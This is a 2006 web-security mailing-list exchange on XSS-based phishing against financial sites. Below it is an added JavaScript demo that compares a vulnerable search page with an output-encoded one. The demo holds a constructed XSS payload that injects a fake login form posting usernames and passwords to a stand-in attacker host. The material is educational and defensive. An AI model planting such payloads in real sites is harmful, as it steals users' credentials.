
Re: [WEB SECURITY] XSS-Phishing on Financial Sites (Tip of the iceberg)




Too funny.  Maybe someone should inform Visa of the PCI security standard
and have one of the authorized scanning vendors check their site for common
web application security issues such as XSS...

*Sed quis custodiet ipsos custodes.*
*"But who is watching the watchers?"*

-- 
Ryan C. Barnett
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
Author: Preventing Web Attacks with Apache


On 6/23/06, Jeremiah Grossman <jeremiah@whitehatsec.com> wrote:
>
> On the heels of the Paypal-XSS Phishing article...
>
> Robert Auger (cgisecurity.com) pointed me to another timely article
> about Phishing attacks using XSS vulnerabilities [1]. The reporter
> does a good job of describing the finer details (with screenshots) on
> why the technique is so effective. The reporter even called out
> Visa.com, JPMorganChase.com, eBay, Nasdaq.com, BankofAmerica.com,
> American Express, Barclays, Microsoft.com as having XSS (details
> withheld).  Unsurprising since we know just about every website out
> there has XSS. These are the same techniques I described during last
> year's Black Hat presentation "Phishing with Superbait" [2] and we can
> expect a lot more of the same in the coming year.
>
> While Phishing is one possible angle to XSS, new avenues of attack
> are emerging that are increasingly similar to the general
> capabilities of today's malware. These are threats far more dangerous
> than we originally anticipated when we began researching XSS years
> ago. For instance, when you visit a website (even a trusted website)
> the page port scans your network and reconfigures your DSL/Router
> from the inside. This will be the subject matter of my talk this year
> at BH "Hacking Intranet Websites from the Outside".
>
> I think it was Bruce Schneier who said attacks always get better,
> never worse. The same holds true here.
>
>
> [1] Flaws in Financial Sites Aid Scammers
> http://blog.washingtonpost.com/securityfix/2006/06/
> flaws_in_financial_sites_aid_s.html
>
> [2] Phishing with Superbait
> http://www.whitehatsec.com/presentations/phishing_superbait.pdf
>
>
> Regards,
>
> Jeremiah Grossman
> Founder and CTO
> WhiteHat Security, Inc.
> www.whitehatsec.com
>
>
>
>
>
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>

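The XSS-phishing technique the quoted message describes (a reflected flaw on a trusted financial site used to serve a fake login form from that site's own domain), shown as an added example that is not code from either poster or from any site named in the thread. The "search" page, the bank and attacker host names, and the payload are all constructed for illustration; the vulnerable render sits beside the output-encoded one so the difference is visible.

```javascript
// Added example, not from the original post: a minimal reflected-XSS
// "search" page rendered two ways, and the phishing payload such a flaw
// enables. Site name, parameter and payload are constructed (hypothetical).

// HTML-encode the five characters that matter in text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Vulnerable: echoes the query parameter straight into the page body.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Hardened: same page, untrusted value encoded on output.
function renderSearchHardened(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Constructed phishing payload: closes the heading and injects a login form
// posting to an attacker-controlled host. Because the page is served from
// the trusted domain, the address bar and certificate look legitimate.
const PHISHING_PAYLOAD =
  '</h1><form action="http://attacker.example/collect" method="POST">' +
  'Session expired. Please sign in again.<br>' +
  '<input name="user"><input name="pass" type="password">' +
  '<input type="submit" value="Sign in"></form><h1>';

// Crude check standing in for the victim's browser: does the rendered page
// contain a live <form> whose action leaves the trusted host?
function containsInjectedForm(html, trustedHost) {
  const m = /<form[^>]*action="([^"]*)"/i.exec(html);
  if (!m) return false;
  try {
    return new URL(m[1]).host !== trustedHost;
  } catch (e) {
    return false; // relative action: stays on the trusted host
  }
}

// Render the crafted link's response both ways and compare.
function demo() {
  const trustedHost = 'bank.example';
  const vulnerable = renderSearchVulnerable(PHISHING_PAYLOAD);
  const hardened = renderSearchHardened(PHISHING_PAYLOAD);
  return {
    vulnerableHasForm: containsInjectedForm(vulnerable, trustedHost),
    hardenedHasForm: containsInjectedForm(hardened, trustedHost),
    hardenedShowsPayloadAsText: hardened.indexOf('&lt;form') !== -1,
  };
}

console.log(demo());
```

The hardened version still displays the attacker's text, but as inert characters: the browser never sees a `<form>` element, so there is nothing for the victim to submit. The same encoding discipline has to be applied wherever untrusted data lands (attribute, URL, script and CSS contexts each need their own encoder), which is why a single reflected parameter missed on one page is enough for the attacks the article describes.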



Brought to you by http://www.webappsec.org